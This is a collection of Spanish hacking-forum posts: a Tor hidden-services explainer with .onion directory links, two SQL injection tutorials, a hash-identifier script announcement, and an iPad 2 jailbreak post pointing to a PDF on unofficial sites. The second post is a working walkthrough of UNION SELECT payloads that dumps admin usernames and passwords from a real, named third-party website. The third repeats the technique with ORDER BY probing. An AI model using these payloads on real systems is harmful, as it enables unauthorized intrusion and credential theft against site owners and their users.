hellway

ueno... hoy me toca hablar a pedido de un amigo (no precisamente muy entendido en informática) que me pregunta del "mundo oculto de internet" (underground) sobre las redes prohibidas de intercambio de información ilegal, material terrorista, anarquista, asesinatos, violaciones, psicóticos (todo lo que no se encuentra fácilmente en internet pero se sabe que existe, y que si llega a aparecer en web libres es rápidamente bajado y/o borrado), todo esto gracias a que había leído una web (que no nombraré por sensacionalista) con mucho de psicosis y paranoia, pero poco clara, la web hablaba de todo, pero como buenos periodistas, nada a la vez. Nombraban un tal TOR como una herramienta que para lo último que servía era para el anonimato (el clásico personaje hablando de informática (y “supers jakers”) creyendo que sabe...)...En fin, antes de entrar de lleno al tema, quiero aclarar que el mundo underground de verdad es aquel al cual uno no tiene fácilmente acceso como el que voy a explicar en un rato más, el "mundo oculto de internet" se encuentra protegido por una "password" por decirlo más lindo. Los conspiradores, terroristas, pederastas, violadores, etc, no son tan tontos como para dejar su información libre en internet (y que los rastreen sencillamente), efectivamente la tienen para su comodidad en internet, pero está cifrada (con populares programas como TrueCrypt, y varios otros programas, alguna vez también expliqué como se comunicaba Al Qaeda ;D) o son lindas web inofensivas que ingresando con un usuario y password llegas al real sitio que oculta en él todo ese material no apto para todos, también clásicamente los “hackers” se comunican en IRCs privados, bueno y muchas redes privadas más... Para mi ese es el real "mundo oculto de internet".Ahora sí que entro de lleno a lo que iba explicar sobre ese "mundo oculto de internet" que si tenemos fácilmente a nuestro alcance y que sorprendentemente si tiene material altamente ilegal... Me refiero a un “Servicio oculto” que nos ofrece TOR (pongo entre comillas “oculto” ya que encuentro muy irrisorio que sea “oculto”, ya que todos lo saben, y ustedes ahora también).TOR como herramienta de anonimato también puede proporcionar anonimato a servidores. Usando la red Tor, es posible a los servidores anfitrión ocultarse para que su localización y quienes los usen sean desconocidas. Estos servicios usan una dirección .onionComo buenos servidores anónimos, puedes cargar en ellos toda la información que se te ocurra y del índole que más te interese.Lalo (mi amigo NO muy informático): ¿ Como #$!$%# accedo a esas webs? ¿Se encuentran en Google?Zion3R: No se encuentran en Google y a continuación te digo como acceder a ellas.Simplemente hay que instalar TOR en nuestro computador (no voy a enseñar cómo, ya están grandes… o si no busquen en google como instalarlo) y accedan por su web browser favorito a las mencionadas páginas .onion.Lalo: Ya instalé el TOR, ahora ¿qué hago?Zion3R: Bueno, si te diste cuenta mi contertulio, sin Google no sabes que mierda hacer con internet, pero bueno, yo te daré 3 pistas del Mundo Onion.Pista 1: “The Hidden Wiki” (nuevamente me da mucha risa el título, nadie sabe que existe… ), http://kpvz7ki2v5agwt35.onion/wiki/index.php/Main_PageAquí puedes encontrar la presentación del proyecto TOR y además muhcos links a webs .onion. (al parecer no está on la hidden wiki)Pista 2: “TorDir” http://eqt5g4fuenphqinx.onion/ http://dppmfxaacucguzpc.onion/index.php?sid=08e275eb2e787a41de379fa1fb9d2a21Aquí se indexan varios sitios según temática: Adult, Email, IM, Communications, Hacking and Related, Reference and Core sites, Social, Software, Activism, Political and Revolutionary, Business, Gambling, Librarys, Security, Social File/happiness sharing.Pista 3: “DuckDuck Go” http://3g2upl4pq6kufc4m.onion/Se supone que este buscador si indexa los resultados .onion, yo no lo creo XD. Antes existía un Toogle que indexaba resultados .onion, pero al parecer se cayó.Lalo: Que lata tener que acceder a TOR para meterme en esas webs.Zion3R: De partida, no sé porque mierda quieres acceder a esas webs, yo no he encontrado nada bueno por lo menos, y para más remate he encontrado contenido detestable, pero bueno, el humano es de naturaleza curioso… Yo te tengo la solución para que no tengas que abrir TOR... Tor2web!!, es muy simple de usar, simplemente a una URL hay que cambiarle el .onion por .tor2web.org, por ejemplo: http://dppmfxaacucguzpc.onion ---> https://dppmfxaacucguzpc.tor2web.org/Lalo: Excelente! Creo que me queda claro.Bueno, eso sería todo, podría seguir escribiendo, pero mejor que ustedes mismo exploren... Pero quiero dejar 3 preguntas abiertas a mis lectores: ¿Serán estas webs anónimas el futuro para las webs que estan siendo silenciadas en todo el mundo por leyes anti copia? ¿Cómo se puede denunciar material ofensivo (pedofilia, violaciones, etc..) si supuestamente estas webs y servidores son anónimos? Además que se supone que por el sólo hecho de entrar con TOR el usuario es anónimo... ¿Es necesario tanta libertad (libertinaje) en la web o es bueno que Internet sea moderada?TOR : https://www.torproject.org/TrueCrypt : http://www.truecrypt.org/

La inyeccion SQl consta de introducir un codigo SQL para librar consultas o para introducir datos.-bueno vamos a comenzarlo primero es encontrar un web vulnerable para eso puse el post de Dork en sql, buscamos con eso en San Google y para ver si una web es vulnerable borramos todo lo que sale a la derecha del dork en la direccion de la pagina q encontramos y ponemos una comilla simple (')por ejemplo:Código:/products.php?catcode=11&catname=Bicycle%20Tube%20Valve/products.php?catcode='listo nos da un error con eso podemos hacer las consultas, primero vamos a ver en que columnas hacerlas para eso ponemos/products.php?catcode=-1+UNION+SELECT+1despues vamos agregando numeros al final separados por comas hasta que aparescan las columnas vulnerables/products.php?catcode=-1+UNION+SELECT+1,2/products.php?catcode=-1+UNION+SELECT+1,2,3/products.php?catcode=-1+UNION+SELECT+1,2,3,4/products.php?catcode=-1+UNION+SELECT+1,2,3,4,5/products.php?catcode=-1+UNION+SELECT+1,2,3,4,5,6/products.php?catcode=-1+UNION+SELECT+1,2,3,4,5,6,7products.php?catcode=-1+UNION+SELECT+1,2,3,4,5,6,7,8/products.php?catcode=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9/products.php?catcode=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10salio un numero, el 2, aveces salen mas o otros numeros, bueno con ese numero inyectaremos nuestro codigo en ese numero y al final de la columnaprimero veremos los nombres de las tablas lo podemos hacer asi:usaremos:group_concat(table_name)+from+information_schema.tablesentonces quedara/products.php?catcode=-1+UNION+SELECT+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10+from+information_schema.tableslo malo que cuando son muchas tablas con ese codigo no se ven todas entonces ocuparemos otrogroup_concat(table_name)+from+information_schema.tables+limit+20,1--quedara:/products.php?catcode=-1+UNION+SELECT+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10+from+information_schema.tables+limit+1,1--E iremos cambiando el penultimo numero de la sentencia:/products.php?catcode=-1+UNION+SELECT+1,group_concat(table_name),3,4,5,6, 7,8,9,10+from+information_schema.tables+limit+2,1-- /products.php?catcode=-1+UNION+SELECT+1,group_concat(table_name),3,4,5,6, 7,8,9,10+from+information_schema.tables+limit+3,1--hasta encontrar columnas interesantes como usuarios, admin, tbluser, cosas asi, bueno con la primera inyeccion encontramos la tablaadminahora queremos saber que contiene la admin para ello debemos pasarlo a ascii, quedara:97,100,109,105,110entonces pondremos otra inyeccion y utilizaremos:group_concat(column_name)+from+information_schema.columns+where+table_name= char(el codigo en ascii)al final quedara/products.php?catcode=-1+UNION+SELECT+1,group_concat(column_name),3,4,5,6 ,7,8,9,10+from+information_schema.columns+where+ta ble_name=char(97,100,109,105,110)encontramos lo que tiene : username,passwordentonces ahora queremos ver que tienen esas columnas entonces utilizaremos:concat_ws(char(58),aqui ponemos lo q encontramos)+from+la tabla que encontramos en este caso adminquedara:/products.php?catcode=-1+UNION+SELECT+1,group_concat(column_name),3,4,5,6 ,7,8,9,10+from+adminerror 0_0!jaja no desesperen no todos dejan concatenar entonces hacemos esto/products.php?catcode=-1+UNION+SELECT+1,username,3,4,5,6,7,8,9,10+from+admin/products.php?catcode=-1+UNION+SELECT+1,password,3,4,5,6,7,8,9,10+from+adminbueno ya tenemos el usuario admin y su password de esa web, bueno ese usario debe tener un login un panel en donde ponga su usuario y contraseña y debemos encontrarlo, en este caso:/adminCreo que Esta muy bien explicado posteare tambien algunos tutoriales mas dificileseste tutorial esta echo sobre la web: h i n d u s t a n i m p e x . c o . i n

Hola amigos os traigo una manera mas facil de hacer injection sql digo mas facil por que a mi uno me resulta mas facil que la clasica ya hemos encontrado la web www.ejemploweb.com/index.php?id=52 de siempre es UNION SELECT 1,2.... O +UNION+ALL+SELECT+1,2... ETC... hay una manera llamada order by que nos ayuda. www.ejemploweb.com/index.php?id=52 ORDER BY 1-- (NO ERROR) www.ejemploweb.com/index.php?id=52 ORDER BY 2-- (NO ERROR) www.ejemploweb.com/index.php?id=52 ORDER BY 3-- (NO ERROR) www.ejemploweb.com/index.php?id=52 ORDER BY 4-- (NO ERROR) www.ejemploweb.com/index.php?id=52 ORDER BY 5-- (NO ERROR) www.ejemploweb.com/index.php?id=52 ORDER BY 6-- (NO ERROR) www.ejemploweb.com/index.php?id=52 ORDER BY 7-- (NO ERROR) www.ejemploweb.com/index.php?id=52 ORDER BY 8-- (NO ERROR) www.ejemploweb.com/index.php?id=52 ORDER BY 9-- (NO ERROR) www.ejemploweb.com/index.php?id=52 ORDER BY 10-- (NO ERROR) www.ejemploweb.com/index.php?id=52 ORDER BY 11-- (ERROR) YA EN EL ORDER BY 11-- ME DIO EROR ENTONCES ENTENDI QUE TENGO K PONER HASTA 10 EJEMPLO : www.ejemploweb.com/index.php?id=52 UNION SELECT 1,2,3,4,5,6,7,8,9,10 de aqui no paso por que me va dar error igual que en el order by!! a mi me resulta mas comoda de usar y con el union select voi a tiro echo entonces espero que a vosotros tambien os sea de mucha utilidad

Hace algún tiempo estaba haciendo auditoria a una servidor, cuando descubro una clásica SQLi, bueno... Estaban comprometidas varias Bases de Datos, en una de las cuales habian muchos usuarios y sus respectivos passwords pero lamentablemente encriptados... Aquí un ejemplo del hash (password):$P$B8nRWVEezB2Qysi6gZu8GYZhXluWU0/En aquellos momentos no tenia idea con que algoritmo estaba encriptado, y me costó bastante saberlo, lo cual es sumamente necesario para poder descifrarlo con Hashcat u otro... Bueno, con un poco de tiempo libre he decido hacer un pequeño script en python para identificar que tipo de encriptación tienen los hashs...El script puede ser muy perfeccionado aun, pero hasta el momento sirve de bastante ayuda... Los algoritmos de encriptación que identifica son: ADLER-32 CRC-32 CRC-16 DES(Unix) FCS-16 GHash-32-5 GOST R 34.11-94 Haval-160 Haval-192 110080 ,Haval-224 114080 ,Haval-256 Lineage II C4 Domain Cached Credentials XOR-32 MD5(Half) MD5(Middle) MySQL MD5(phpBB3) MD5(Unix) MD5(Wordpress) MD5(APR) MD2 MD4 MD5 MD5(HMAC(Wordpress)) NTLM RAdmin v2.x RipeMD-128 SNEFRU-128 Tiger-128 MySQL5 - SHA-1(SHA-1($pass)) MySQL 160bit - SHA-1(SHA-1($pass)) RipeMD-160 SHA-1 SHA-1(MaNGOS) Tiger-160 Tiger-192 md5($pass.$salt) - Joomla SHA-1(Django) SHA-224 RipeMD-256 SNEFRU-256 md5($pass.$salt) - Joomla SAM - (LM_hash:NT_hash) SHA-256(Django) RipeMD-320 SHA-384 SHA-256 SHA-384(Django) SHA-512 Whirlpool Entre otros...Tengo que ser claro que en algunos casos da muchas posibilidades de hashs ya que no se puede saber si un hash es MD5, MD5 doble, MD5(Sha1), hasta que es desencriptado.Aquí el proyecto:http://code.google.com/p/hash-identifier/Espero poder perfeccionar el script de modo de hacerlo lo más eficiente posible y espero su ayuda también, recibo criticas (constructivas XD) y hashs (con su respectivo algoritmo de encriptación) que no hayan sido identificados, para poder agregarlos futuramente...

Hola amigos, ha salido una versión Beta de jailbreak para el iPad 2 la cual es ALTAMENTE RECOMENDABLE esperar la versión oficial pero como no faltan los curiosos que desean probar todo en cuanto sale aqui esta el Jailbreak .NOTA: ESTE JAILBREAK SOLO SIRVE PARA LAS VERSIONES WiFi* Primero deben tener instalado el iOS 4.3 en adelante* Despues deben entrara a safari desde su iPad y entrar a esta página www.ipad2jailbreakpdf.weebly.com ó www.xc0d3.weebly.com/* Después les aparecerá un archivo PDF solo le dan al archivo luego en Jailbreak y LISTO!!!! tendran cydia asi de sencillo.Repito que es recomendable esperar la versión oficial por COMEX aqui les dejo el videotutorial no es necesario que sepan hablar ingles esta muy claro SALUDOSNo nos hacemos responsables por nada ya que esta es una versión BETA si lo haces será bajo tu responsabilidad :-)Ya está a muy poco de salir la versión oficial